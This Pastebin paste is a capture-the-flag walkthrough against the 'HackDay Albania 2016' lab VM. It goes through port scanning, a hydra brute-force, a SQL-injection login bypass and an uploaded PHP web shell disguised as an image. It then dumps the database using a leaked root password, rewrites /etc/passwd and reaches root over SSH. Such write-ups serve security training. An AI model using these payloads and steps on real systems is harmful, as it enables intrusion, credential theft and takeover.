SHARE
TWEET

Untitled

a guest Nov 29th, 2016 442 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Let's check our virtual machine IP:
  2.  
  3. Currently scanning: 192.168.6.0/16   |   Screen View: Unique Hosts                                        
  4.                                                                                                            
  5. 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 84                                            
  6. _____________________________________________________________________________
  7.   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  8. -----------------------------------------------------------------------------
  9. 192.168.1.84    08:00:27:98:0d:5f      1      42  CADMUS COMPUTER SYSTEMS
  10. (...)
  11.  
  12.  
  13. # With that IP, let's scan it to check what's going on:
  14.  
  15. tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84
  16.  
  17. Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
  18. NSE: Loaded 132 scripts for scanning.
  19. NSE: Script Pre-scanning.
  20. Initiating NSE at 00:02
  21. Completed NSE at 00:02, 0.00s elapsed
  22. Initiating NSE at 00:02
  23. Completed NSE at 00:02, 0.00s elapsed
  24. Initiating Ping Scan at 00:02
  25. Scanning 192.168.1.84 [2 ports]
  26. Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
  27. Initiating Parallel DNS resolution of 1 host. at 00:02
  28. Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
  29. Initiating Connect Scan at 00:02
  30. Scanning hackday.lan (192.168.1.84) [65535 ports]
  31. Discovered open port 22/tcp on 192.168.1.84
  32. Discovered open port 8008/tcp on 192.168.1.84
  33. Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
  34. Initiating Service scan at 00:02
  35. Scanning 2 services on hackday.lan (192.168.1.84)
  36. Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
  37. NSE: Script scanning 192.168.1.84.
  38. Initiating NSE at 00:02
  39. Completed NSE at 00:02, 0.51s elapsed
  40. Initiating NSE at 00:02
  41. Completed NSE at 00:02, 0.00s elapsed
  42. Nmap scan report for hackday.lan (192.168.1.84)
  43. Host is up (0.0060s latency).
  44. Not shown: 65533 closed ports
  45. PORT     STATE SERVICE VERSION
  46. 22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  47. | ssh-hostkey:
  48. |   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
  49. |_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
  50. 8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  51. | http-methods:
  52. |_  Supported Methods: GET HEAD POST OPTIONS
  53. | http-robots.txt: 26 disallowed entries (15 shown)
  54. | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
  55. | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
  56. | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
  57. |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
  58. |_http-server-header: Apache/2.4.18 (Ubuntu)
  59. |_http-title: HackDay Albania 2016
  60. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  61.  
  62. NSE: Script Post-scanning.
  63. Initiating NSE at 00:02
  64. Completed NSE at 00:02, 0.00s elapsed
  65. Initiating NSE at 00:02
  66. Completed NSE at 00:02, 0.00s elapsed
  67. Read data files from: /usr/bin/../share/nmap
  68. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  69. Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
  70. tlopes@blackbox:~$
  71.  
  72.  
  73. -- we can see 2 different services running at ports 8008 (http) and 22 (ssh)
  74.  
  75. # Robots.txt shows a lot of disallowed entries, let's check what's there:
  76.  
  77. tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
  78.   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  79.                                  Dload  Upload   Total   Spent    Left  Speed
  80. 100   702  100   702    0     0   307k      0 --:--:-- --:--:-- --:--:--  685k
  81. ======
  82. Folder: /rkfpuzrahngvat/
  83. <!DOCTYPE html>
  84. <html lang="en">
  85. <head>
  86.     <meta charset="UTF-8">
  87.     <title>Hmmmm????</title>
  88. </head>
  89. <body>
  90.     <center><img src="background.jpg"></center>
  91. </body>
  92. </html>
  93. ======
  94. Folder: /slgqvasbiohwbu/
  95. <!DOCTYPE html>
  96. <html lang="en">
  97. <head>
  98.     <meta charset="UTF-8">
  99.     <title>Hmmmm????</title>
  100. </head>
  101. <body>
  102.     <center><img src="background.jpg"></center>
  103. </body>
  104. </html>
  105. ======
  106. Folder: /tmhrwbtcjpixcv/
  107.  
  108. (...)
  109.  
  110. ======
  111. Folder: /unisxcudkqjydw/
  112. IS there any /vulnbank/ in there ???
  113.  
  114. ======
  115.  
  116. # Opening  http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/" and then going to "client/login.php"
  117. -- it was possible to see a login form
  118.  
  119. # Submitting the form with variable names changed to Arrays username[] and password[] gave the following error:
  120.  
  121. Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
  122. Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
  123. Invalid Credentials . . .
  124.  
  125. -- I tried with some variants but nothing special happened
  126.  
  127. # I've executed hydra to try some user/pass combinations but without luck
  128. hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"
  129.  
  130. # At the same time, I've executed sqlmap that found one blind injection ..
  131. -- haven't luck on putting sqlmap owning the database for me, so I did it for myself:
  132. .. after some tries.. I was able to bypass the form using the following combination:
  133.  
  134. username: ' or 'a' = 'a' --
  135. password: #
  136.  
  137. # On the new page there's a "Contact Support" form
  138. -- I tried to upload a .php file but it failed (only images allowed)
  139. -- so I renamed the file to .jpg and it worked!
  140.  
  141. tlopes@blackbox:~$ cat shell.jpg
  142. <?php
  143. system($_GET['cmd']);
  144.  
  145. # Testing the PHP:
  146.  
  147. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
  148. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  149.  
  150. # It worked! local access to the shell
  151.  
  152. # Checking what's going on the current dir
  153.  
  154. -- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
  155. total 52
  156. drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
  157. drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
  158. -rwxr-xr-x 1 taviso taviso   87 Oct 19 08:31 client.php
  159. -rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
  160. drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
  161. -rwxr-xr-x 1 taviso taviso  403 May 23  2016 index.php
  162. -rwxr-xr-x 1 taviso taviso  348 Oct 20 11:58 login.php
  163. -rwxr-xr-x 1 taviso taviso   81 May 22  2016 logout.php
  164. -rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
  165. drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
  166. -rwxr-xr-x 1 taviso taviso  532 Oct 19 08:29 view_file.php
  167. -rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php
  168.  
  169. # Checking the config.php
  170.  
  171. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
  172. (...)
  173. $db_host = "127.0.0.1";
  174. $db_name = "bank_database";
  175. $db_user = "root";
  176. $db_password = "NuCiGoGo321";
  177. (...)
  178.  
  179. # Dumpping all databases:
  180.  
  181. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
  182. Nothing relevant on the dump
  183.  
  184. # ps axu, init.d, cron.d and other relevant folders didn't returned anything valuable to attack
  185.  
  186. # Tried to exploit mysqld with race conditions to escalate privileges, but it failed due permissions
  187.  
  188. # After some time searching configurations I've found out that passwd was with write permissions:
  189. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
  190. -rw-------  1 root root   1.6K Oct  9 13:13 passwd-
  191. -rw-r--rw-  1 root root   1.6K Oct 22 17:21 passwd
  192.  
  193.  
  194. # Listing all users available:
  195. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd
  196.  
  197. root:x:0:0:root:/root:/bin/bash
  198. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  199. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  200. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  201. sync:x:4:65534:sync:/bin:/bin/sync
  202. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  203. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  204. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  205. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  206. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  207. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  208. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  209. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  210. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  211. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  212. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  213. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  214. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  215. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
  216. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
  217. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  218. systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
  219. syslog:x:104:108::/home/syslog:/bin/false
  220. _apt:x:105:65534::/nonexistent:/bin/false
  221. lxd:x:106:65534::/var/lib/lxd/:/bin/false
  222. mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
  223. messagebus:x:108:112::/var/run/dbus:/bin/false
  224. uuidd:x:109:113::/run/uuidd:/bin/false
  225. dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  226. sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
  227. taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  228.  
  229.  
  230. # Let's try to change "taviso" account to a known password
  231. -- first simulating it in my own computer:
  232.  
  233. tlopes@blackbox:~$ sudo adduser deleteme
  234. [sudo] password for tlopes:
  235. Adding user `deleteme' ...
  236. Adding new group `deleteme' (1001) ...
  237. Adding new user `deleteme' (1001) with group `deleteme' ...
  238. Creating home directory `/home/deleteme' ...
  239. Copying files from `/etc/skel' ...
  240. Enter new UNIX password:
  241. Retype new UNIX password:
  242. passwd: password updated successfully
  243. Changing the user information for deleteme
  244. Enter the new value, or press ENTER for the default
  245.     Full Name []:
  246.     Room Number []:
  247.     Work Phone []:
  248.     Home Phone []:
  249.     Other []:
  250. Is the information correct? [Y/n]
  251.  
  252. tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
  253. deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::
  254.  
  255. # Let's use the previous hash as support to create the new "taviso" entry:
  256.  
  257. taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  258.  
  259.  
  260. # Now, let's remove taviso from /etc/passwd
  261. 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
  262. 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd
  263.  
  264. # And add our new "taviso" created in previous step:
  265.  
  266. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd
  267.  
  268. # Confirming if everything went ok:
  269. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso
  270.  
  271. Yup, the account it's there with our password "password"
  272.  
  273. taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  274.  
  275. # Now let's try to connect using SSH to this account:
  276.  
  277. tlopes@blackbox:~$ ssh taviso@192.168.1.84
  278. The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
  279. ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
  280. Are you sure you want to continue connecting (yes/no)? yes
  281. Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
  282. taviso@192.168.1.84's password:
  283. Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
  284.  
  285.  * Documentation:  https://help.ubuntu.com
  286.  * Management:     https://landscape.canonical.com
  287.  * Support:        https://ubuntu.com/advantage
  288.  
  289. 36 packages can be updated.
  290. 2 updates are security updates.
  291.  
  292.  
  293. *** System restart required ***
  294. Last login: Sat Oct 29 23:07:00 2016
  295. -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
  296. taviso@hackday:~$
  297.  
  298.  
  299. -- BAM!
  300.  
  301. # Let's see if taviso is on sudoers file :
  302.  
  303. taviso@hackday:~$ sudo -i
  304. [sudo] password for taviso:
  305. -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
  306. root@hackday:~#
  307.  
  308. -- BAM!
  309.  
  310. # Let's see what root has on his home dir
  311.  
  312. root@hackday:~#ls -al
  313. total 28
  314. drwx------  3 root root 4096 Oct 22 17:21 .
  315. drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
  316. -rw-------  1 root root   58 Oct 22 17:21 .bash_history
  317. -rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
  318. drwxr-xr-x  2 root root 4096 Oct  9 13:18 .nano
  319. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  320. -rw-r--r--  1 root root   61 Oct  9 13:36 flag.txt
  321.  
  322. -- BAM! a flag :)
  323.  
  324. root@hackday:~# cat flag.txt
  325. Urime,
  326. Tani nis raportin!
  327.  
  328. d5ed38fdbf28bc4e58be142cf5a17cf5
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top